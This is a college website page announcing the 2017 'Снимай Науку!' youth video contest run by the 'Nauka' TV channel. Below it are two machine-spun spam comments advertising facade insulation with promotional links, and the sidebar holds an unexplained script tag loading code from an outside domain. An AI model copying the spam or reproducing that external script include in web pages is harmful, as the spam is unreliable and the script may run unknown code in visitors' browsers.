Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2017 » Июль » 11 » Телеканал «Наука» проводит среди молодежи видеоконкурс «Снимай Науку!»
16:11
Телеканал «Наука» проводит среди молодежи видеоконкурс «Снимай Науку!»

ДОРОГИЕ ДРУЗЬЯ!

Телеканал «Наука» проводит среди молодежи видеоконкурс «Снимай Науку!»

 

Присылайте прикольные оригинальные

видеоработы и их увидит вся страна!

 

НОМИНАЦИИ

  1. 1. «Эксперимент» - видеоролик, посвященный научному эксперименту или серии экспериментов в рамках одного исследования, сопровождаемый пояснениями исследователя в кадре или за кадром;
  2. 2. «Научное явление» - съемка любого наблюдаемого явления, в том числе с использованием специальных технических средств (телескопов, микроскопов и пр.), сопровождаемая пояснениями наблюдателя в кадре или за кадром;
  3. 3. «Лайфхак» - бытовой видеосовет, в основе которого лежит научное обоснование;
  4. 4. «Научная инфографика» - 2D и 3D графическая анимация, содержащая объяснения научных экспериментов и природных явлений;

5. «Наука 360» - панорамная видеосъемка любых научных исследований и явлений, сопровождаемая пояснениями исследователя/наблюдателя.

Победителей ждут интересные призы!

Более подробная информация на  www.naukatv.ru

Просмотров: 480 | Добавил: agropedcolledg | Рейтинг: 0.0/0
Всего комментариев: 2
2 ppu-prof_oi  
0
Наша группа опытных специалистов завершена предъявить вам прогрессивные приемы, которые не только предоставят надежную безопасность от мороза, но и подарят вашему домашнему пространству оригинальный вид.
Мы эксплуатируем с последовательными средствами, ассигнуруя долгий период работы и отличные результаты. Утепление фасада – это не только сокращение расходов на отапливании, но и заботливость о экосистеме. Энергоэффективные технические средства, какие мы внедряем, способствуют не только зданию, но и сохранению экосистемы.
Самое первоочередное: <a href=https://ppu-prof.ru/>Цена м2 утепление фасада дома</a> у нас составляет всего от 1250 рублей за м²! Это доступное решение, которое изменит ваш дом в подлинный душевный локал с минимальными затратами.
Наши проекты – это не только изолирование, это постройка пространства, в где каждый элемент выражает ваш индивидуальный образ действия. Мы возьмем во внимание все ваши пожелания, чтобы осуществить ваш дом еще еще более дружелюбным и привлекательным.
Подробнее на <a href=https://ppu-prof.ru/>http://ppu-prof.ru</a>
Не откладывайте заботу о своем жилище на потом! Обращайтесь к экспертам, и мы сделаем ваш жилище не только согретым, но и моднее. Заинтересовались? Подробнее о наших работах вы можете узнать на веб-ресурсе. Добро пожаловать в пространство комфорта и качества.

1 ppu-prof_oi  
0
Наша бригада искусных специалистов завершена предъявить вам инновационные системы, которые не только подарят надежную защиту от холодильности, но и дарят вашему зданию стильный вид.
Мы трудимся с самыми современными компонентами, гарантируя долгосрочный срок службы службы и замечательные решения. Теплоизоляция наружных стен – это не только экономия ресурсов на отапливании, но и забота о экосистеме. Сберегательные технологии, какие мы производим, способствуют не только зданию, но и сохранению природной среды.
Самое основное: <a href=https://ppu-prof.ru/>Утепление дома снаружи цена под ключ</a> у нас стартует всего от 1250 рублей за кв. м.! Это доступное решение, которое превратит ваш дом в реальный теплый район с минимальными затратами.
Наши проекты – это не только изолирование, это разработка области, в где каждый компонент отражает ваш личный моду. Мы примем во внимание все ваши пожелания, чтобы осуществить ваш дом еще еще более теплым и привлекательным.
Подробнее на <a href=https://ppu-prof.ru/>официальном сайте</a>
Не откладывайте дела о своем жилище на потом! Обращайтесь к исполнителям, и мы сделаем ваш жилище не только комфортнее, но и стильным. Заинтересовались? Подробнее о наших работах вы можете узнать на официальном сайте. Добро пожаловать в сферу гармонии и качества.

Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Июль 2017  »
ПнВтСрЧтПтСбВс
     12
3456789
10111213141516
17181920212223
24252627282930
31

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz